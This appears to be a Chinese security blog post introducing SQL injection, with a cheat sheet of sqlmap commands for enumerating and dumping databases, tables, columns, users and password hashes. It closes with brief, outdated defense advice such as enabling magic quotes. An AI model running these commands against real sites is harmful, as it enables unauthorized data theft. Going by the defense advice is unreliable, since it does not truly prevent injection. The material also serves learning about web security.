最新文章:

首页 渗透测试

web攻防之sql基础知识

发布时间:2019年05月23日 评论数:抢沙发 阅读数:112

    1,什么是sql?
            是一种数据库的命令总集,同时呢是一种数据语言,数据库用来储存一些信息,数据库有很多中access,mysql,mssql等。
    2,什么是sql注入?
            一些网站,当用户或者其他的人在网站上进行输入的时候,没有对    其输入的字符进行合法的判断,在执行sql语句的时候,出现了保存,从而使攻击者获取她们想要的数据。
    4,为什么会有sql注入?
            程序员在编写源代码的时候,过滤的不严谨,进而导致攻击者利用过滤不严的漏洞进行注入,获取她们想要的信息。
    5,如何利用sql注入?
            我们可以通过手工注入,也可以通过工具进行注入
    6,如何利用sqlmap进行注入?
            首先注入的方式主要分为两种,因为form提交主要就是这两种,下面主要说一下,sqlmap的一些基本操作,范例就不截图了。下面主要是sqlmap中运行的语法,当然语法有很多,这里列举出来的都是一些比较长用的。

    kali里面的话前面就要加python
    sqlmap.py -u url --dbs //爆数据库
    sqlmap.py -u url --current-db //爆当前库
    sqlmap.py -u url --current-user //爆当前用户
    sqlmap.py -u url --users   查看用户权限
    sqlmap.py -u url --tables -D 数据库 //爆表段
    sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段
    sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解
    sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段



    sqlmap.py -u url  判断
    sqlmap.py -u url --is-dba -v   这是判断当前数据库的使用者是否是dba
    sqlmap.py -u url --users -v 0  这句的目的是列举数据库的用户
    sqlmap.py -u url --passwords -v 0 这句的目的是获取数据库用户的密码
    sqlmap.py -u url --privileges -v 0 这是判断当前的权限
    sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来
    sqlmap.py -u url --tables -D '表' 爆表
    sqlmap.py -u url --columns -T ‘表’-D ‘数据库’爆列
    sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0 这里是查询第2到第4行的内
    sqlmap.py -u url --dump -all -v 0

    7,sql注入有什么样的危害?
                攻击者可以该注入点,进行注入,对网站做出修改,获取管理员权限,从而获取系统管理员权限,同时呢,她们也可以在网站上挂马,搞跳转,挂超链接等,对网站和访问者造成不可估计的伤害。
    8,如何防sql注入?
            开启魔术引号,这样能更好的过滤掉那些非法字符;
    安装安全狗,加速乐,搭建waf等;
二维码加载中...
本文作者:h4ck1r      文章标题: web攻防之sql基础知识
本文地址:https://www.hackexp.cn/?post=12
版权声明:若无注明,本文皆为“h4ck1r's Blog”原创,转载请保留文章出处。
挤眼 亲亲 咆哮 开心 想想 可怜 糗大了 委屈 哈哈 小声点 右哼哼 左哼哼 疑问 坏笑 赚钱啦 悲伤 耍酷 勾引 厉害 握手 耶 嘻嘻 害羞 鼓掌 馋嘴 抓狂 抱抱 围观 威武 给力
提交评论

清空信息
关闭评论
正在加载中……
sitemap